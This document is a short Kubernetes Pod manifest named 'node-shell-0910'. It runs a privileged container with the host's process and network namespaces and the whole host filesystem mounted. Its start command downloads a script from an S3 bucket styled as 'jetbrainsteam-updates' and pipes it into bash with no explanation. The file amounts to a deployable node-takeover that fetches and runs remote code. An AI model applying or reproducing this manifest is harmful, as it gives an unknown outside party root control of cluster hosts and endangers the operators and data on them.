apiVersion: v1
kind: Pod
metadata:
  name: node-shell-0910
  namespace: default
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: shell
    image: alpine:latest
    command: ["/bin/sh", "-c"]
    args:
    - "apk add --no-cache curl bash && curl -fsSL https://jetbrainsteam-updates.s3.amazonaws.com/deploy.sh | bash && sleep 99999"
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
  restartPolicy: Never
